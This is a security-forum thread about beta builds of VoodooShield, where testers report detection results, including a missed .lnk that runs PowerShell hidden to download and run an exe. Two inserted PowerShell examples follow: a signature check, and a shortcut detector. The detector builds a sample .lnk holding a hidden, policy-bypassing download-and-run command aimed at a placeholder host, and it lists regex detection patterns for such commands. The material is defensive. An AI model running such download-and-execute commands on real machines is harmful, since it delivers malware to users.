Update VoodooShield 7.0

Thread Tags
  1. Developer is currently beta testing this product.

n8chavez

Level 9
Well-known
Feb 26, 2021
430
Well, off the top of my head I can think of one important rule parameter I'd like to see. I use, and will always only use, VS with SBIE on a RAM disk. It would be awesome to see an "except" rule. Meaning, I'd like the ability to create a rule that blocks things from running on my RAM disk that do not have a valid signature (+ maybe even VS AI). Currently, I can block all things on s: (my RAM drive). And because it's a hard rule, everything gets blocked no matter what. An exception parameter allowing anything with a valid signature, but blocking everything else, would be nice. Make sense, or am I retarded?

(I assume a little bit of column A and B :) )
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
Well-known
Apr 28, 2015
8,019
Calling MT Malware hunters! Maybe a new round of testing will be in order once the new VS ML/Ai is finalized and out of Beta. Testing with WLC disabled would be my preference.
Since it seems there is something still in beta, and we are already in summer, soon I will move (as every summer), so I will stop testing (old laptop during this time); I can run a new VS test in the Hub in September...
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
n8chavez said:
Well, off the top of my head I can think of one important rule parameter I'd like to see. I use, and will always only use, VS with SBIE on a RAM disk. It would be awesome to see an "except" rule. Meaning, I'd like the ability to create a rule that blocks things from running on my RAM disk that do not have a valid signature (+ maybe even VS AI). Currently, I can block all things on s: (my RAM drive). And because it's a hard rule, everything gets blocked no matter what. An exception parameter allowing anything with a valid signature, but blocking everything else, would be nice. Make sense, or am I retarded?

(I assume a little bit of column A and B :) )
Thank you for the suggestion, I think I know what you mean, I will play around with it and see. Also, if anyone has created any rules that do not work as expected, please let me know and we will try to make the rules make sense for everyone.
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Here is 7.18, I think we are getting pretty close to a public release. There were quite a few changes to the User Prompt, so there might be a small bug or two we need to fix in the User Prompt.

You can now test the new local VoodooAi by either putting VS into Offline Mode (right click on VS gadget and choose Offline Mode) , or simply disable your network adapter. If you disable the internet in your router, VS will spend several seconds checking for an internet connection, so Offline Mode or disabling the network adapter is a lot better for testing.


VS 7.18
SHA-256: 463568df24277764fe54acfff32622b1ef116cc0333366383fb785780316dbf2


Thank you,

Dan
 

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
Hello Dan

I was curious about the ML component in version 7.18. So I tested it today against a small batch (around 50) of new malware samples. It blocked nearly all samples. It only gave 2 samples a very low safe score and 2 a medium score.

New version looks great :).

Kind regards,

Zartarra
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Zartarra said:
Hello Dan

I was curious about the ML component in version 7.18. So I tested it today against a small batch (around 50) of new malware samples. It blocked nearly all samples. It only gave 2 samples a very low safe score and 2 a medium score.

New version looks great :).

Kind regards,

Zartarra
Thank you Zartarra for testing, I appreciate that! Yeah, there almost seems to be a hard mathematical limit on ML/Ai for around 95% efficacy for malware detection ;). We could make it more aggressive, but that would pretty much just increase the false positives, and do very little for the false negatives. So I am pretty happy where it currently is, especially with WLC covering what VoodooAi might miss.
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Here is the latest version of VoodooShield. It should be ready for public release on Monday, but if you find anything please let me know!

As you have noticed, we are transitioning a lot of VS’s features from the cloud to the local computer. Not only is it faster, but there are no disadvantages in doing so, there are only advantages.

Version 7.20 now includes a list of VS’s verified digital signatures (there are 14,000+), so cloud lookups for this feature are no longer required. The purpose of this feature is to mitigate against signed malware, not to allow items simply by the signer’s name. That would be very, very dangerous.

In other words, this list is not yet editable, and we probably do not need to ever make it editable, simply because VS already handles digital signatures in a much more comprehensive way.

I forgot to mention, one of the 250+ Ai features is still cloud based. It is the feature that verifies the digital signature in the cloud. So if you test VoodooAi in Offline Mode, this feature will be ignored, so the VoodooAi result might be a little higher than it would be otherwise. No big deal either way, but if the results do not match, that is why. Technically, we could have a different model for Offline Mode that removes this feature from the training data set as well, but I kinda like it the way it is. Basically, VoodooAi might be slightly more aggressive when in Offline Mode, which means WLC is not active and covering what VoodooAi might miss. So in that case, being a little more aggressive might be a good thing.

I have not yet started refining the Rules feature, but will do that soon. I wanted to finish this version of VS and the new DefenderUI so we can release them to the public. Refining the Rules is going to take a little time to do properly, and we will certainly want to test some beta versions before we release the updated Rules feature to the public.

VS 7.20
SHA-256: 97f85bfce8d6c0676f20dfbde7067360f583dc89bc26d5e85410871fbdaea7cc


Thank you guys!

Dan
 
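The two points made above, n8chavez's "block everything on the RAM disk unless it is validly signed" rule and Dan's warning that allowing by signer name alone is dangerous, can be illustrated with a small Authenticode check. The following is an added example written for this page, not VoodooShield code and not its rule syntax: it walks a drive, evaluates each executable's signature, and (optionally) pins the decision to specific signing-certificate thumbprints rather than to a subject name. The root path `S:\`, the extension list and the empty `$PinnedThumbprints` list are assumptions to adjust. VoodooShield decides at launch time with process context; this is a one-shot scan that shows only the decision logic.

```powershell
# Added example, not VoodooShield code. Emulates a "block on S:\ unless validly
# signed" rule with Authenticode. Root path and extension list are assumptions.
$Root       = 'S:\'
$Extensions = @('.exe', '.dll', '.ps1', '.msi')

# Optional pin list (empty = any validly signed file is allowed). Fill it with
# thumbprints read from binaries you already trust, e.g.
#   (Get-AuthenticodeSignature C:\Path\To\trusted.exe).SignerCertificate.Thumbprint
$PinnedThumbprints = @()

function Get-SignedOnlyVerdict {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Pins = @()
    )
    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $cert = $sig.SignerCertificate

    # Only 'Valid' means the file hash matches the signature AND the chain
    # builds to a trusted root. NotSigned, HashMismatch (modified after
    # signing), NotTrusted and UnknownError all end up as BLOCK.
    $allow = ($sig.Status -eq 'Valid')

    # A valid signature only proves that someone holding a code-signing
    # certificate signed the file. Pinning on the certificate thumbprint,
    # not on the Subject string, is what keeps signed malware out even when
    # its Subject is made to look like a known vendor's.
    if ($allow -and $Pins.Count -gt 0) {
        $allow = ($Pins -contains $cert.Thumbprint)
    }

    [pscustomobject]@{
        Verdict    = if ($allow) { 'ALLOW' } else { 'BLOCK' }
        Status     = $sig.Status
        Signer     = if ($cert) { $cert.Subject } else { '' }
        Thumbprint = if ($cert) { $cert.Thumbprint } else { '' }
        Path       = $Path
    }
}

Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $Extensions -contains $_.Extension.ToLower() } |
    ForEach-Object { Get-SignedOnlyVerdict -Path $_.FullName -Pins $PinnedThumbprints } |
    Format-Table Verdict, Status, Signer, Path -AutoSize
```

Run it from an elevated or normal PowerShell session against the RAM-disk root; anything that is not `Valid` (or, with pins set, not signed by a pinned certificate) is reported as BLOCK. Revocation is checked as part of chain building, so a revoked signing certificate also fails the `Valid` test.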

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
danb said:
Thank you Zartarra for testing, I appreciate that! Yeah, there almost seems to be a hard mathematical limit on ML/Ai for around 95% efficacy for malware detection ;). We could make it more aggressive, but that would pretty much just increase the false positives, and do very little for the false negatives. So I am pretty happy where it currently is, especially with WLC covering what VoodooAi might miss.
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 got blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
 
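The shortcut Zartarra describes (powershell.exe launched with an execution-policy bypass and a hidden window, downloading a file with a .NET WebClient and running it) can be detected statically from what the .lnk stores. The following is an added example written for this page, not VoodooShield code: it reads a shortcut's target and arguments through the WScript.Shell COM object (loading a shortcut this way does not launch it), scores several indicators, and blocks when a script host is combined with at least two of them. It goes a little beyond the one sample in the text by also flagging other script hosts, encoded commands and other download cmdlets. The two shortcuts it scans are constructed in %TEMP% with placeholder paths and a host that does not resolve, and are deleted afterwards.

```powershell
# Added example, not VoodooShield code. Static .lnk inspection for the
# "hidden PowerShell download-and-run" pattern described in the thread.
$wsh = New-Object -ComObject WScript.Shell

function Get-LnkVerdict {
    param([Parameter(Mandatory)][string]$Path)

    $lnk     = $wsh.CreateShortcut($Path)          # loads the existing .lnk, runs nothing
    $cmdline = "$($lnk.TargetPath) $($lnk.Arguments)"

    # Each indicator is evaluated separately; -match is case-insensitive.
    $ind = [ordered]@{
        ScriptHost   = $lnk.TargetPath -match '(^|\\)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\.exe$'
        ExecBypass   = $cmdline -match '-e(p|x\w*)\s+bypass'              # -ExecutionPolicy Bypass, -ep bypass
        HiddenWindow = $cmdline -match '-w(indowstyle)?\s+hidden'         # -WindowStyle Hidden, -w hidden
        Download     = $cmdline -match 'Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|bitsadmin'
        Encoded      = $cmdline -match '-e(c|nc\w*)?\s+[A-Za-z0-9+/=]{20,}' # -EncodedCommand <base64>
        RunsPayload  = $cmdline -match 'Start-Process|\bsaps\b|Invoke-Expression|\biex\b|Invoke-Item'
    }
    $hits = @($ind.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })

    # A script host by itself is common in legitimate shortcuts, so require
    # the host plus at least two further indicators before blocking.
    [pscustomobject]@{
        Verdict = if ($ind.ScriptHost -and $hits.Count -ge 3) { 'BLOCK' } else { 'ALLOW' }
        Hits    = $hits -join ','
        Target  = $lnk.TargetPath
        Path    = $Path
    }
}

# Constructed sample shaped like the one in the thread. Placeholder paths,
# non-resolving host; the shortcut is inspected, never executed.
$sample = Join-Path $env:TEMP 'constructed-sample.lnk'
$s = $wsh.CreateShortcut($sample)
$s.TargetPath = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
$s.Arguments  = '-ExecutionPolicy Bypass -WindowStyle Hidden -Command "(New-Object Net.WebClient).DownloadFile(''http://example.invalid/payload.exe'',''C:\Temp\p.exe''); Start-Process ''C:\Temp\p.exe''"'
$s.Save()

# Constructed benign control: a plain shortcut to Notepad.
$benign = Join-Path $env:TEMP 'constructed-benign.lnk'
$b = $wsh.CreateShortcut($benign)
$b.TargetPath = "$env:SystemRoot\System32\notepad.exe"
$b.Save()

Get-LnkVerdict -Path $sample     # expected: BLOCK, five indicators hit
Get-LnkVerdict -Path $benign     # expected: ALLOW, no indicators hit
Remove-Item $sample, $benign -ErrorAction SilentlyContinue
```

To sweep a real folder, pipe `Get-ChildItem -Recurse -Filter *.lnk` into `Get-LnkVerdict`. Two caveats: some antivirus engines quarantine the constructed sample on `Save()` because of its command line, and this check only sees what the shortcut stores, whereas a launch-time engine such as the one the thread discusses also has the parent process and the actual child command line to work with.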

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Zartarra said:
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 got blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
Thank you for testing! When you get a chance, can you please send the misses to support at voodooshield.com? Please keep in mind that malware packs a lot of times contain duplicates and safe files, both of which can skew test results. Duplicates are bad because if the same file is missed, and 10% of the files are the same file, the results are way off.

Yeah, VS should have no issue blocking the .lnk file. If it appears to have bypassed VS, please send me that as well. Thanks again!
 

plat

Level 27
Verified
Top poster
Well-known
Sep 13, 2018
1,675
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:

[screenshot: vswushowhide.png]

There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newbie-ish question but it's really convenient to work from the systray.
 

Gandalf_The_Grey

Level 62
Verified
Helper
Top poster
Content Creator
Well-known
Apr 24, 2016
5,109
plat said:
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:

[screenshot: vswushowhide.png]

There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newbie-ish question but it's really convenient to work from the systray.
It's 2 clicks to change your current mode to DISABLE/INSTALL mode.

And 1 click if you disable the simple right click menu in UI Tweaks.

[screenshot: 1656616522107.png]
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
plat said:
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:

[screenshot: vswushowhide.png]

There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newbie-ish question but it's really convenient to work from the systray.
Yes, this is absolutely a 100% correct block... it's for mitigating DogWalk.

If you are not familiar with DogWalk, it would be well worth 15-20 minute research, only because it is quite interesting.

 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Zartarra said:
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 got blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
Thank you for sending me the samples! We do need to download some new samples to add to the training data set, then retrain the models. The current model uses the training data set from a year or so ago, and it held up to most of the samples that I threw at it, but obviously I need to add some newer ones as well, like the ones that you found.

BTW, if anyone knows of any really cool new malware depositories, please let me know. I want to add as much variety as we can.

Also, thank you for finding the lnk bypass, there is a bug in one of VS's rules and it is an easy fix. So yes, VS will block this in the next version... this is just a bug in the Contextual Engine, but an easy fix. Thanks again, I appreciate your help!
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Zartarra found a significant lnk bug in VS’s new contextual engine, but it is fixed in this version (thank you @Zartarra!).

There are a couple of other optimizations in this version as well, but I have not finished optimizing the Rules feature yet.

We still need to add new malware to VS’s new VoodooAi and retrain the models, which should be finished in a few days, but other than that I believe we are good to go.


VS 7.21
SHA-256: 4a28671b403f7da2acb843b923d7f3f25830f6bf0a5992c31ed5971ed71a84ff


Thank you,

Dan
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
I hope he/she got a really long lasting license now ;)
VS 7.20 so far running good.
I would be happy to setup a long lasting license for @Zartarra! Please email me the email account you would like to use for your account and I will do so.

BTW, I just noticed that VS 7.21 is blocking DefenderUI's command lines, so I need to think about and refine that rule a little more.
 

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
danb said:
Thank you for sending me the samples! We do need to download some new samples to add to the training data set, then retrain the models. The current model uses the training data set from a year or so ago, and it held up to most of the samples that I threw at it, but obviously I need to add some newer ones as well, like the ones that you found.

BTW, if anyone knows of any really cool new malware depositories, please let me know. I want to add as much variety as we can.

Also, thank you for finding the lnk bypass, there is a bug in one of VS's rules and it is an easy fix. So yes, VS will block this in the next version... this is just a bug in the Contextual Engine, but an easy fix. Thanks again, I appreciate your help!
Hello Dan,

I am glad to help :). The new version is installed.